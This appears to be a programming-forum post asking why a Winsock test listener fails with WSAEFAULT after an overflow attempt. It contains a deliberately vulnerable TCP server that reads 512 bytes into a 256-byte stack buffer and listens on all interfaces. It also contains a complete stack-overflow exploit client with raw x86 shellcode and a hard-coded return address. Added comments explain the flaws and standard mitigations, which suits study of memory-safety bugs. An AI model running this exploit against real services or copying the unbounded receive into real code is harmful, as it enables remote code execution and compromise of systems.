Okay. Here's the real question. Is Winsock smarter than me? Lots of evidence points to: yes. For example, here is my program being stupid.

Code:
#include <winsock2.h>
#include <stdio.h>

// Minimal single-connection TCP listener used as an overflow test target.
// Listens on port 1337 on every local interface (INADDR_ANY), accepts one
// client, then loops on recv() printing each call's result.
//
// NOTE(review): the receive length (512) is twice the size of buf (256).
// The bounded form would be recv(hClient, buf, sizeof(buf) - 1, 0), which
// also leaves room for the terminator written after each read.
// NOTE(review): INADDR_ANY exposes this deliberately unsafe listener to the
// network, not just to the local test client; binding to the loopback
// address would keep it local.
int main(int argc, char ** argv)
{
	char         buf[256];
	WSADATA      wsaData;
	SOCKET       hSock;
	SOCKET       hClient;
	SOCKADDR_IN  sIn;
	

	// Return values of WSAStartup/socket/bind/listen are not checked, so a
	// failure in any of them only becomes visible when accept() fails.
	WSAStartup(MAKEWORD(2, 2), &wsaData);

	hSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	// sIn is not zeroed first; only these three fields are assigned.
	sIn.sin_family = AF_INET;
	sIn.sin_addr.s_addr = INADDR_ANY;
	sIn.sin_port = htons(1337);

	bind(hSock, (sockaddr *) &sIn, sizeof(SOCKADDR_IN));
	listen(hSock, 1);

	hClient = accept(hSock, NULL, NULL);
	if(hClient != INVALID_SOCKET)
	{
		printf("client accepted\n");
		int  ret;
		// recv() is told it may write 512 bytes into a 256-byte stack array, so
		// any message longer than 256 bytes is written past the end of buf.
		// NOTE(review): WSAEFAULT is documented for an invalid buffer pointer or
		// a too-small buffer; presumably the stack layout sometimes leaves the
		// claimed 512-byte range not fully valid, and the call is rejected before
		// any data is copied. Confirm with a debugger.
		// The loop ends on ret == 0 (peer closed); SOCKET_ERROR is non-zero and
		// therefore still enters the body.
		while(ret = recv(hClient, buf, 512, 0))
		{
			printf("recv'd content: %d\n", ret);
			// Never true here: the while condition already stops the loop at 0.
			if(ret == 0)
				break;
			else if(ret == SOCKET_ERROR)
			{
				// Prints the numeric Winsock error code.
				printf("%d\n", WSAGetLastError());
				break;
			}
			else
				// Terminates the received data; out of bounds whenever ret >= 256.
				buf[ret] = 0;

		}
	}
	// Neither hClient nor hSock is passed to closesocket() before cleanup.
	WSACleanup();
	return 0;
}
And when I try to overflow it with an exploit program, I get some funny behavior. I am normally able to get it to work, like, once, and after that recv consistently fails and WSAGetLastError() reports 10014. Which is:

WSAEFAULT: 10014 - Bad address. The system detected an invalid pointer address in attempting to use a pointer argument of a call. This error occurs if an application passes an invalid pointer value, or if the length of the buffer is too small. For instance, if the length of an argument, which is a sockaddr structure, is smaller than the sizeof(sockaddr).

Here is the exact exploit program I used

Code:
#include <windows.h>
#include <stdio.h>

// Raw machine-code payload that main() copies into the outgoing buffer.
// NOTE(review): the bytes appear to load two hard-coded absolute addresses
// (the 4-byte values following each 0xB8) and call them, which would tie the
// payload to one specific OS/DLL build with fixed load addresses. Which
// functions those addresses refer to is not shown here.
// The array holds no embedded zero byte, so strlen() on it covers every byte.
char shellcode[] = 
	"\x31\xD2\x52\x52\x52\x52\xB8\xEA\x04\xD8\x77\xFF"
	"\xD0\x31\xC0\x50\xB8\xA2\xCA\x81\x7C\xFF\xD0";


// Test client for the listener on 127.0.0.1:1337: builds one 300-byte message
// (larger than the listener's 256-byte receive array) and sends it in a single
// send() call, printing the number of bytes sent.
//
// NOTE(review): the layout relies on two fixed values, the offset 260 and the
// absolute address 0x7C82385D. Both are only meaningful for one particular
// build of the target and of the system DLLs. Stack cookies (/GS), DEP and
// ASLR are the standard mitigations against this class of overwrite.
int main()
{
	// 300 bytes of filler.
	char buffer[300];
	for(int i = 0; i < sizeof(buffer); i++)
		buffer[i] = 'X';

	// Hard-coded 4-byte value at offset 260. Presumably meant to land on the
	// saved return address of the listener's main(); the page does not show the
	// target's actual frame layout.
	*(int *) (buffer + 260) = 0x7C82385D;
	// Payload placed directly after that value. strlen() stops at the first zero
	// byte; no <string.h> include is visible for memcpy/strlen.
	memcpy(buffer + 264, shellcode, strlen(shellcode));

	// WSAStartup's return value is not checked.
	WSADATA wsaData;
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	SOCKET hSock;


	hSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	// This early return skips WSACleanup().
	if(hSock == INVALID_SOCKET)
		return 0;

	sockaddr_in clientService;

	// Loopback only: the target is expected on the same machine, port 1337.
	clientService.sin_family = AF_INET;
	clientService.sin_addr.s_addr = inet_addr("127.0.0.1");
	clientService.sin_port = htons(1337);

	if(connect(hSock, (sockaddr *) &clientService, sizeof(clientService)) == SOCKET_ERROR) 
	{
		// hSock is not closed on this path.
		printf("Failed\n");
		WSACleanup();
		return 0;
	}

	// Prints send()'s return value: the byte count, or SOCKET_ERROR on failure.
	printf("%d\n", send(hSock, buffer, sizeof(buffer), 0));
	closesocket(hSock);
	WSACleanup();
	return 0;
}
How? When? Where? Who? Why?